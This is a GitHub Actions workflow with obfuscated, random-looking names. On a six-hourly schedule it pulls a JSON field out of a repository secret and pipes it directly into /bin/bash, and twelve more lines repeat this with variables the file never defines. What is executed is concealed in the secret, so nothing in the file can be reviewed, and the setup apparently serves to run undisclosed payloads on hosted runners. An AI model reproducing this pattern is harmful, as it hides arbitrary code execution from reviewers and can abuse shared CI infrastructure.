name: liuyidao4657
on:
  workflow_dispatch:
  schedule:
    - cron: '38 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liuyidao4657
        env:
          crng190: ${{ secrets.crng190 }}
        run: |
          echo $crng190 | jq -r .pnvn706 | /bin/bash
          echo $d0811 | jq -r .n33 | /bin/bash
          echo $d04854 | jq -r .p2628 | /bin/bash
          echo $qjhuf739 | jq -r .qygzv23911 | /bin/bash
          echo $goox870 | jq -r .tac8 | /bin/bash
          echo $olz75 | jq -r .tqx8 | /bin/bash
          echo $ubmgy702 | jq -r .oals8 | /bin/bash
          echo $mjp8310 | jq -r .of409 | /bin/bash
          echo $ez4 | jq -r .mjnfc4 | /bin/bash
          echo $lovb07 | jq -r .mynxv45 | /bin/bash
          echo $wa18 | jq -r .bz5 | /bin/bash
          echo $grcs99565 | jq -r .qai9 | /bin/bash
          echo $npvza788 | jq -r .phc1 | /bin/bash

